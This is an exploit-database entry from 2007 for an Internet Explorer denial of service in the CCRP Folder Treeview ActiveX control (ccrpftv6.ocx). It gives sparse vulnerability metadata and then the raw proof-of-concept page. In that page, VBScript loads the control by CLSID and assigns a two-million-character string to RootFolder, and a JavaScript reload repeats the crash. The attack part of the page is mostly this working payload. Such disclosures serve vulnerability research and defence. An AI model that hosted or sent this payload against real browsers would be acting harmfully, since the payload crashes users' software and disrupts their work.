CCRP Folder Treeview Control (ccrpftv6.ocx) Internet Explorer Denial of Service

vendor:

Unknown

by:

shinnai

N/A

CVSS

N/A

Denial of Service

Unknown

CWE

Product Name: Unknown

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE: Unknown

CPE: Unknown

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Professional SP2 with Internet Explorer 7

2007

CCRP Folder Treeview Control (ccrpftv6.ocx) Internet Explorer Denial of Service

The CCRP Folder Treeview Control (ccrpftv6.ocx) in Internet Explorer is vulnerable to a Denial of Service attack. By sending a specially crafted argument to the RootFolder parameter, an attacker can cause Internet Explorer to crash and become unresponsive. This vulnerability has been tested on Windows XP Professional SP2 with Internet Explorer 7.

Mitigation:

Unknown

Source

Exploit-DB raw data:

<!--
-------------------------------------------------------------------------------
CCRP Folder Treeview Control (ccrpftv6.ocx) Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-------------------------------------------------------------------------------
-->

<html>
<object classid='clsid:19B7F2D6-1610-11D3-BF30-1AF820524153' id='CCRP' ></object>
<script language='vbscript'>

argCount = 1

arg1=String(2000000, "A")

CCRP.RootFolder = arg1

</script>

<script language='javascript'>
 document.location.reload()
</script>

# milw0rm.com [2007-01-17]